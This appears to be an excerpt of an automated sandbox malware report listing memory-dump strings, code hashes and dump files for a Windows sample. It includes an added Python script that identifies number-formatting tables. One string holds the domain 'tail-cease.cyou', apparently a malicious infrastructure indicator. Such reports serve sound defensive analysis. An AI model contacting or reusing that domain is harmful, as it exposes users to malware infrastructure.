          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: Nw|$#7su$Q"}$kU_$r%^$rwM
          • API String ID: 0-336308472
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
          • API String ID: 0-3274379026
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: G]go$a.uo$AT|$AgP$l'~
          • API String ID: 0-2788956160
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: Asw{$ONht$gc}$|Uc0$$wm
          • API String ID: 0-1697021706
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: Lk$U\$Zb$r$tail-cease.cyou
          • API String ID: 0-3714716009
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: )=+4$57$7514$84*6$N
          • API String ID: 0-4020838272
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: +2/?$=79$BBSH$GZE^
          • API String ID: 0-3392023846
          • Opcode ID: 89e8cd591af2d31ad3a38983f6aa6a4be625eb291e6cb7a18bc1682ffbfa5382
          • Instruction ID: 4ac84388d6d1d6b678da0abf79ab88a3c7fab2bf8f0e3eeda242c97517ee3d49
          • Opcode Fuzzy Hash: 89e8cd591af2d31ad3a38983f6aa6a4be625eb291e6cb7a18bc1682ffbfa5382
          • Instruction Fuzzy Hash: F452E070504B418FC736CF39C890667BBE2BF5A314F188A6DD4E68BB92D735A806CB50
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: H{D}$TgXy$_o]a$=>?
          • API String ID: 0-2004217480
          • Opcode ID: cc59235269f6bac6de908ab28efa265a9c04665a628b39d96a70dd777c8f606d
          • Instruction ID: b672cb43ac92a88794b8f27608da60ac37ff0aee34dfbc4f8417a3232e5580d6
          • Opcode Fuzzy Hash: cc59235269f6bac6de908ab28efa265a9c04665a628b39d96a70dd777c8f606d
          • Instruction Fuzzy Hash: 551247B1214B01CFD3248F26D895B97BBF5FB45314F048A2DD5AA8BAA0DB74B545CF80
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: =:;8$=:;8$a{$kp
          • API String ID: 0-2717198472
          • Opcode ID: 716977e87bc2fd512ea2b7cabbc5a188a9f13c8163d3dfa25571c2ec50548e8c
          • Instruction ID: 9a5be817a252ed557fff237603e0b65701a45dcdbf5a77283b79bdba9eb9a019
          • Opcode Fuzzy Hash: 716977e87bc2fd512ea2b7cabbc5a188a9f13c8163d3dfa25571c2ec50548e8c
          • Instruction Fuzzy Hash: A2E1EDB5518341CFE320DF24EC81B6BBBE1FBD5304F14892CE5998B2A1EB749955CB82
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: @A$lPLN$svfZ$IK
          • API String ID: 0-1806543684
          • Opcode ID: 6f7aff7656b2d64d2ede23a8bdde6c001909a3cd1fd40340ff6fd1f87cb8fda7
          • Instruction ID: 97af96c2ccaec121e053ed1ad080afb5a2326af9e7cf1b167655e1a2dab739bd
          • Opcode Fuzzy Hash: 6f7aff7656b2d64d2ede23a8bdde6c001909a3cd1fd40340ff6fd1f87cb8fda7
          • Instruction Fuzzy Hash: 93C1147164C3948BD3288E6494E136FBBE2EBD2710F19C92CE4E54B395D775CC0A8B82
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: C8~$Q~"{$e?o
          • API String ID: 0-2436440116
          • Opcode ID: 2509642b066b9f35f65350383a4f9bded85609b9b9ebca68aaec4ed9421e5d8e
          • Instruction ID: c5b9e733689c8559993395c5c4a56ef3c64b9e21d8d5f9dc737fda26984a97b9
          • Opcode Fuzzy Hash: 2509642b066b9f35f65350383a4f9bded85609b9b9ebca68aaec4ed9421e5d8e
          • Instruction Fuzzy Hash: 4BB204F3A0C2149FE304AE2DEC8566AFBE5EF94720F1A493DEAC483744E63558058697
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: 4\[L$Df{}
          • API String ID: 0-1074219043
          • Opcode ID: fcb09771fffa603a75cb7702ecdf5b57c0712ef4fe3443452a92cd8e677a3bbd
          • Instruction ID: 3e75254ee44c44010da6b63b91c906b0d98758845ab2899b4e5a5e703ee1a1a8
          • Opcode Fuzzy Hash: fcb09771fffa603a75cb7702ecdf5b57c0712ef4fe3443452a92cd8e677a3bbd
          • Instruction Fuzzy Hash: 83B2F5F36082149FE304AE2DEC8567AFBE9EF94720F16493DEAC4C3744EA3558058697
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: @J$KP$VD
          • API String ID: 0-3841663987
          • Opcode ID: 246aa6a331f99538a622fbba13448e43e713a1027fa00e3f268c837123ce3919
          • Instruction ID: 9af3a928df417bbe8dac9cf13eaf5e062cef92f9fe0f7ff7af2d6409cb12e4c6
          • Opcode Fuzzy Hash: 246aa6a331f99538a622fbba13448e43e713a1027fa00e3f268c837123ce3919
          • Instruction Fuzzy Hash: 50916472704B01AFD720CF68DC81BABBBB1FB85310F14452CE5959B781D374A956CB92
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: PQ$A_$IG
          • API String ID: 0-2179527320
          • Opcode ID: 984e998144ef0b83d4eb2f8e20a4b4e77d88939c562c96ab6ebaeed878199b43
          • Instruction ID: e90b79fb2b003256d2d249364a4a5736a6a5e732297a63125d32e048c59706d1
          • Opcode Fuzzy Hash: 984e998144ef0b83d4eb2f8e20a4b4e77d88939c562c96ab6ebaeed878199b43
          • Instruction Fuzzy Hash: 0A41ACB400C341DAC704CF21D89266BB7F1FF96758F249A0DF0D19B6A1E7748686CB9A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: cC$jC
          • API String ID: 0-2055910567
          • Opcode ID: c536b8f43e53fe99216be59d1fc40478ff18f14edcde77090c0d1fc48db15d0a
          • Instruction ID: bce5c36411374d4c3001dd06524457e4c4c10fef2f95fe2c014dcf7878149416
          • Opcode Fuzzy Hash: c536b8f43e53fe99216be59d1fc40478ff18f14edcde77090c0d1fc48db15d0a
          • Instruction Fuzzy Hash: 2142F232A04215CFDB08CF68D8906AEB7F2FF89311F1A857EC956A7791C7349942CB90
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: InitializeThunk
          • String ID: f$
          • API String ID: 2994545307-508322865
          • Opcode ID: 5c177ab3e23408abd4244b80f257bbf86189458badef0cd2770a95c40a9bd20f
          • Instruction ID: 159179f64c0be97bea5705d7997db42fdb0cd3c3ae4fad84f1c62981bfbd5f3b
          • Opcode Fuzzy Hash: 5c177ab3e23408abd4244b80f257bbf86189458badef0cd2770a95c40a9bd20f
          • Instruction Fuzzy Hash: 3412C3706083419FD714CF28D890A2BBBF1BBD5324F64CA6CF599972A2D731D942CB92
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: N\AT
          • API String ID: 0-3125660783
          • Opcode ID: afe732ed7c130107c9b2237d4172ad101e0df76bfd214dcb82e6a010b782344a
          • Instruction ID: 1c3bbf5d31c96dfbbf99f8562df44b0c3510e5b02bf58556beb92faf7c6373bc
          • Opcode Fuzzy Hash: afe732ed7c130107c9b2237d4172ad101e0df76bfd214dcb82e6a010b782344a
          • Instruction Fuzzy Hash: 02B207F360C2109FE704AE29DC8567ABBE9EF94720F1A893DE6C4C7744E63598418793
          Strings
          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 001725D2
          • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00172591
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
          • API String ID: 0-2492670020
          • Opcode ID: d243d0a8751e0e6fdf8520253116cebd30411adaba78b7a5312d26b055e68f13
          • Instruction ID: a32a83a20994cc1ee6516291dcd4d163050f5e6916d49fe839b3b0e818123796
          • Opcode Fuzzy Hash: d243d0a8751e0e6fdf8520253116cebd30411adaba78b7a5312d26b055e68f13
          • Instruction Fuzzy Hash: F3811A32A086914BCB1D893C8C512E97BB25F67330F2EC3A9E8B59B3D5D73589468351
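The two strings this function reads at 001725D2 and 00172591 are recognisable runtime tables rather than sample-specific data: "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" is the digit alphabet of an `_itoa`-style conversion for any radix up to 36, and the 200-character "000102...9899" table is the two-digits-per-iteration lookup that several language runtimes use to format decimal integers quickly. Seeing both referenced from one function is a strong hint that it is a number formatter pulled in from the runtime, which lets you deprioritise it when triaging the unpacked code. Which runtime the sample was built with is not something this report states, and the constants alone do not settle it. The script below is an added example written for this page, not code from the sample or from Joe Sandbox: it reimplements both conversions so the table usage is concrete, and scans a region for the tables. The sample region it scans is constructed inline.

```python
# The two constants referenced at xrefs 001725D2 and 00172591 (copied from the report).
DIGITS36 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
DEC_PAIRS = "".join(f"{i:02d}" for i in range(100))   # "000102...9899", 200 bytes


def format_radix(value: int, radix: int) -> str:
    """Radix 2..36 conversion of the _itoa/_ultoa kind: each remainder indexes DIGITS36."""
    if not 2 <= radix <= 36:
        raise ValueError("radix must be in 2..36")
    neg, value = value < 0, abs(value)
    out = []
    while True:
        value, rem = divmod(value, radix)
        out.append(DIGITS36[rem])
        if value == 0:
            break
    if neg:
        out.append("-")
    return "".join(reversed(out))


def format_decimal_pairs(value: int) -> str:
    """Two-digits-per-iteration decimal formatting driven by the 200-byte pair table;
    it halves the number of divisions compared with the one-digit loop above."""
    if value < 0:
        return "-" + format_decimal_pairs(-value)
    chunks = []
    while value >= 100:
        value, rem = divmod(value, 100)
        chunks.append(DEC_PAIRS[2 * rem:2 * rem + 2])     # e.g. rem 45 -> "45"
    chunks.append(DEC_PAIRS[2 * value:2 * value + 2] if value >= 10 else DIGITS36[value])
    return "".join(reversed(chunks))                      # chunks were produced low to high


def classify_formatting_constants(region: bytes) -> dict[str, list[int]]:
    """Locate the two tables in a dumped region and report their offsets, so a
    function that reads them can be triaged as numeric formatting code."""
    hits: dict[str, list[int]] = {}
    for label, table in (("decimal_pair_table", DEC_PAIRS), ("radix36_alphabet", DIGITS36)):
        needle = table.encode("ascii")
        offsets, pos = [], region.find(needle)
        while pos != -1:
            offsets.append(pos)
            pos = region.find(needle, pos + 1)
        if offsets:
            hits[label] = offsets
    return hits


# Constructed sample region (not a real dump): padding, the two tables, more padding.
SAMPLE_REGION = b"\x90" * 16 + DEC_PAIRS.encode() + b"\x00" * 8 + DIGITS36.encode() + b"\xcc" * 4

if __name__ == "__main__":
    print(classify_formatting_constants(SAMPLE_REGION))
    print(format_radix(0xDEADBEEF, 16), format_radix(-35, 36), format_decimal_pairs(1234567890))
```

To apply this to the real dump, read the 0x141000 region file into `region` instead of `SAMPLE_REGION`; the offsets it returns, added to the region base, should land at the addresses the xrefs above point to. A match confirms only that the function formats numbers, so the interesting question becomes who calls it and what value it is formatting, not what it does internally.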
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: 0$8
          • API String ID: 0-46163386
          • Opcode ID: 55711fff25fafb968c0ec706ff494a388e39b53d56ca2f82953c225e76a697a2
          • Instruction ID: c6ed4601dfbaf2d680d5465ddd574b3e813151eb1baa32348ecfbaa6b9ec00d7
          • Opcode Fuzzy Hash: 55711fff25fafb968c0ec706ff494a388e39b53d56ca2f82953c225e76a697a2
          • Instruction Fuzzy Hash: 90A11175608780DFD320CF28D840B9EBBE2AB99304F18895CE9D897362C775DA59CF52
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
